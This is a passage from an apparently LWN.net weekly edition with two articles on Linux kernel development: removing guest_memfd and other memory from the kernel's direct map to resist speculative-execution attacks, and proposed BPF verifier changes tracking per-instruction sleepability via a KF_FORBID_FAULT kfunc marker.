The kernel's direct map provides code running in kernel mode with direct access to all physical memory installed in the system — on 64-bit systems, at least. It obviously makes life easier for kernel developers, but the direct map also brings some problems of its own, most of which are security-related. Interest in removing at least some pages from the direct map has been simmering for years; a couple of patch sets under discussion show some use cases for memory that has been removed from the direct map, and how such memory might be efficiently managed.

The good thing about the direct map is that it gives the kernel easy access to all of the system's installed memory. That is also the bad thing about the direct map, of course. When all of memory is accessible, it becomes a target for attackers. A stray pointer might be pressed into service to corrupt data anywhere in the system (though technologies like supervisor mode access prevention can help). Directly mapped memory is also susceptible to speculative-execution attacks, which can be employed to exfiltrate information from the kernel or from an unrelated process or virtual machine.

Many of these attacks can be thwarted by removing memory from the direct map; if memory is not reachable, the kernel cannot access it and, as a result, cannot disclose or modify its contents. The memfd_secret() system call will remove memory from the direct map for this reason, but wider use of direct-map removal has been slow to come. Memory that is not in the direct map is harder to manage, and there are a number of performance problems that can be caused by removing memory from the direct map. So, while various patches have been in circulation for a while, they have not generally cleared the bar for inclusion in the mainline kernel.

guest_memfd

A common use case for large Linux systems is to run virtualized guests, often hosting multiple unrelated — and possibly hostile — users. It should come as no surprise that there are attackers out there who are interested in targeting some of those virtual machines from others on the same host. There are a number of efforts being made to thwart such attacks, at both the hardware and software levels; one of those is this patch set implementing direct-map removal of guest_memfd pages, posted by Nikita Kalyazin, built on work initially posted by Patrick Roy.

A guest_memfd is a form of memfd (a block of memory attached to a file descriptor) intended for use by virtual machines. This memory has a number of special characteristics, including the fact that it cannot normally be mapped into user space on the host system. That makes attacks from the hosts a bit harder, but there is more that can be done.

On systems with the right sort of hardware support, memory in a guest_memfd can be encrypted, making access from outside the virtual machine impossible. Not only is the host unable to decrypt the contents of the memory; any attempt to access it will generate a machine-check exception. That makes encrypted memory into a sort of land mine that would be best removed from the host kernel's address space entirely. Beyond that, though, encrypted memory is far from universally available. On systems where guest memory is not encrypted, removing it from the direct map will make it more resistant to attacks from the host, and far less susceptible to speculative-execution attacks from hostile guests.

So this patch set adds a new flag, GUEST_MEMFD_FLAG_NO_DIRECT_MAP, to the KVM_CREATE_GUEST_MEMFD ioctl() call provided by the KVM hypervisor. When that flag is present, the memory assigned to the newly created memfd will be removed from the host kernel's direct map. Internally, the series creates a new address-space flag, AS_NO_DIRECT_MAP, to mark an address space that is not directly mapped. When the memfd is freed, the underlying memory will be restored to the kernel's direct map.

Direct-map removal creates an interesting problem: how does KVM itself, running on the host, access the memory within the guest_memfd? There are a number of operations, many having to do with emulated I/O devices, that need that sort of access. The problem is solved by mapping the guest_memfd memory into the user-space address space (on the host) of the KVM process that is running the guest; KVM can then access that memory by way of functions like copy_from_user(). The end result is that the mapping of the memory has been shifted from the kernel's address space to a specific user space. That is sufficient to protect it from speculative-execution attacks on the kernel from a different guest.

This patch series has been circulating since July 2024, and has yet to clear the bar for merging into the mainline kernel. There are a few concerns holding this kind of work back, one of which is the performance implications of fragmenting the kernel's direct map, which, when it can, uses a huge mapping, reducing pressure on the system's translation lookaside buffer (TLB). Work done by Mike Rapoport a few years ago showed that the performance implications are not as bad as some had feared, but this fragmentation is still best avoided if possible. Meanwhile, flushing the TLB globally to reflect direct-map changes is expensive. Another roadblock, though, is that KVM can be built as a loadable module, and the memory-management developers are reluctant to export the ability to manipulate the direct map to modules. Given that there are other potential reasons to remove memory from the direct map, perhaps a better way of doing that is indicated here.

Enter the mermap

Brendan Jackman has been working on a more general address-space isolation (ASI) patch series for a while now. As a general rule, memory that does not appear within a given address space cannot be attacked by way of speculative-execution gadgets or more straightforward vulnerabilities. The kernel can already isolate its address space from user space to defend against Meltdown attacks, but this technique could be taken much farther. For example, many system calls could be at least partially implemented without access to most of the kernel's address space, with wider access only being granted for the code that strictly needs it.

Needless to say, any sort of practical address-space isolation will require removing memory from the direct map. As part of an effort to push this work forward, Jackman has posted a patch series to make the management of unmapped memory easier and more efficient.

Specifically, this series adds a new GFP flag, __GFP_UNMAPPED, that can be used to request unmapped memory from the page allocator. This allows the page allocator to manage these pages in a relatively efficient manner; they can be grouped together in a separate memory block, allowing them to be allocated and freed without changing the direct map every time (or fragmenting the direct map), and without the need for global TLB flushes. Allocating unmapped pages becomes a lot like allocating any other sort of page.

Except, of course, there are some complications. For example, another flag implemented by the page allocator is __GFP_ZERO, which requests that the pages be zero-filled. How can the kernel perform that zeroing without access to the memory involved? The answer is something that Jackman calls the "mermap", which is evidently a shortening of "ephemeral mapping". The pages in question are temporarily mapped into the kernel's address space, but only for the local CPU; they can then be zeroed, and there is no need for the global TLB flush that a wider mapping would require. An implication of this implementation, though, is that holding references to ephemerally mapped pages blocks migration for the running task, since it would lose access to those pages on any other CPU.

The page allocator needs to be able to track unmapped pages to be able to efficiently manage them. As Jackman points out in the series cover letter, the page allocator already has a mechanism for grouping pages by an attribute: the migration type, which is used to separate, for example, allocations of movable memory from those for unmovable memory. The migration type could thus be used to describe unmapped memory but, in current kernels, it can only track one attribute. A page might be both unmapped and unmovable, for example; the attributes are orthogonal to each other, and should be tracked separately. Migration types, as implemented, cannot support orthogonal attributes.

To address that shortcoming, Jackman's series adds the concept of a "freetype", described as "just a migratetype plus some flags". The current uses of migration types are, themselves, migrated to freetypes in a relatively large patch; work later in the series then adds the unmapped attribute and enables the page allocator to work with it, culminating in the implementation of __GFP_UNMAPPED.

This mechanism, once in place, would allow the guest_memfd machinery to more efficiently work with unmapped pages. It also "serves as a Trojan horse to get the page allocator into a state where adding ASI's features 'Should Be Easy'". None of that work appears in this series, though. What does appear is an update to memfd_secret() to use __GFP_UNMAPPED pages. This implementation is described as "hacky", though, since Jackman feels it could be optimized further.

Overall, __GFP_UNMAPPED is only in its second revision; that is early days for this sort of core page-allocator change. It is likely to require some work yet, before it can be considered for the mainline. This series will, though, certainly serve as fodder for discussion at the upcoming Linux Storage, Filesystem, Memory Management, and BPF Summit, to be held in early May, as will the guest_memfd work that it supports. Stay tuned.

Comments (1 posted)

Tracking when BPF programs may sleep

By Daroc Alden
March 23, 2026

BPF programs can run in both sleepable and non-sleepable (atomic) contexts. Currently, sleepable BPF programs are not allowed to enter an atomic context. Puranjay Mohan has a new patch set that changes that. The patch set would let BPF programs called in sleepable contexts temporarily acquire locks that cause the programs to transition to an atomic context. BPF maintainer Alexei Starovoitov objected to parts of the implementation, however, so acceptance of the patch depends on whether Mohan is willing and able to straighten it out.

In an atomic context, kernel code is not allowed to do anything that would delay the continued execution of the kernel, such as waiting for block I/O or faulting a page back into memory. It is usually up to the kernel programmer (assisted by the kernel's various forms of instrumentation) to make sure that they don't accidentally call a function that can sleep in such a context. BPF programs were originally only capable of running in atomic contexts, and were therefore never allowed to call functions that could sleep. In 2020, the BPF verifier was extended to handle BPF programs that could sleep (by marking the entire program with a special flag), but such programs were not permitted to call many of the existing BPF interfaces, which assumed they could transition to an atomic context.

The main advantage of marking a BPF program as sleepable is that it is allowed to copy data from user space (which can sleep if the data needs to be faulted back into memory). Since that is generally useful, it would be nice if more BPF programs could be marked as sleepable; currently, many cannot because they need to take locks or acquire resources that are only available in an atomic context. Mohan's patch set allows for more fine-grained accounting of contexts in BPF programs by having the BPF verifier track whether the program is allowed to sleep on an instruction-by-instruction basis instead of globally for the whole program.

The BPF verifier tracks which kernel resources a BPF program has access to at a given point by looking for kfuncs (kernel functions to which BPF programs have access) that are annotated with the KF_ACQUIRE and KF_RELEASE markers. When a program calls a kfunc with the KF_ACQUIRE marker, the verifier tracks the return value and ensures that the program eventually passes it back to a compatible KF_RELEASE kfunc. A preparatory patch in Mohan's series adds support for these flags to BPF iterators. The main patches add another marker, KF_FORBID_FAULT, that tells the verifier that the program is not allowed to sleep as long as it holds a reference to the acquired resource. The intention is just to prevent page faults (hence the name), but the implementation forbids all kinds of sleeps (of which page faults are a subset). KF_FORBID_FAULT can only be used on kfuncs that are already marked with KF_ACQUIRE. Once the resource is released, the program is allowed to sleep again.

In his cover letter, Mohan gave an example of when this increased granularity might be useful. The task_vma iterator lets BPF programs iterate over a task's virtual memory areas (VMAs) — but doing anything with that information is difficult, because the iterator yields vm_area_struct structures. Those structures only remain valid as long as mmap_lock is held. Taking that lock creates a context in which page faults are forbidden, since page-fault handling may need to take the same lock. With his changes, BPF programs can now read from the VMA to obtain a user-space pointer, and then explicitly release the VMA structure to exit the atomic context and interact with user space. (Although, of course, the VMA in question could be unmapped by another CPU as soon as the lock is released, so the program needs to be able to cope with failure.)

    bpf_for_each(task_vma, vma, task, 0) {
        u64 start = vma->vm_start;

        /* Faulting forbidden, but VMA pointer access allowed */
        
        bpf_iter_task_vma_release(&___it);
        
        /* mmap_lock released, VMA pointer invalidated */
        /* Faulting (and sleeping) is fine here. */

        bpf_copy_from_user(&buf, sizeof(buf), (void *)start);
    }

An earlier version of the patch set called the new kfunc marker KF_FORBID_SLEEP, but Starovoitov had concerns about the name and semantics. KF_ACQUIRE is also used for things other than locks, particularly for reference-counted resources; Starovoitov suggested differentiating between KF_ACQUIRE (for reference counts) and KF_ACQUIRE_LOCK (for actual locks), and merging the semantics of KF_FORBID_SLEEP into the latter.

Mohan was fine with that suggestion, but Eduard Zingerman thought it might be worth exploring a more radical change. The verifier currently tracks four kinds of resources that all forbid sleeping, but with different acquire/release logic: active interrupts, active RCU locks, active preemption locks, and other active locks. The list of which kfunc corresponds to which kind of acquire/release logic is hard-coded; Zingerman suggested that, if Mohan was already going to make changes to the meaning of KF_ACQUIRE, it might be worthwhile to explore separate markers for these four categories to make the verifier's logic more generic.

Mohan said that exploring the possibility is now next on his agenda after the current patch set is done. For now, the name of the new annotation was changed to KF_FORBID_FAULT to indicate a narrower intended use. Mohan's follow-up work will look at refactoring the kfunc flags to allow for more precisely identifying the type of lock being used. That may take some time, however, because Starovoitov still has problems with the implementation of the latest version of the patch set. "Sorry. This is no go. We have to go back to the drawing board with the whole thing."

Starovoitov specifically objected to the way that Mohan's code repurposed the id field of the structure that the verifier uses to track stack slots containing references to iterators. There are already several slightly different uses of IDs across the verifier — something Amery Hung is working on cleaning up — and Starovoitov doesn't want to add another one that is specific to iterators when the patch set is supposed to add a generic mechanism.

Mohan has not yet responded to Starovoitov's concerns with a new version of the patch set, but he has submitted another patch set that changes the task_vma iterator to use per-VMA locking instead of mmap_lock. The iterator copies the VMA and drops the lock before providing the VMA to the BPF program, making the iterator usable in sleepable contexts. That patch set is still undergoing revision, but it could solve the specific problem of using task_vma iterators in a sleepable context. Hopefully the more general mechanism (and Zingerman's suggested cleanup) will still be a priority for Mohan afterward, even if the newer patch set meets his needs.

Comments (none posted)

Page editor: Joe Brockmeier

Inside this week's LWN.net Weekly Edition

  • Briefs: LiteLLM compromise; Tor in Taiwan; b4 v0.15.0; 24-hour sideloading; Agama 19; Firefox 149.0; GNOME 50; Krita 5.3.0 and 6.0.0; Quotes; ...
  • Announcements: Newsletters, conferences, security updates, patches, and more.
Next page: Brief items>>

Copyright © 2026, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds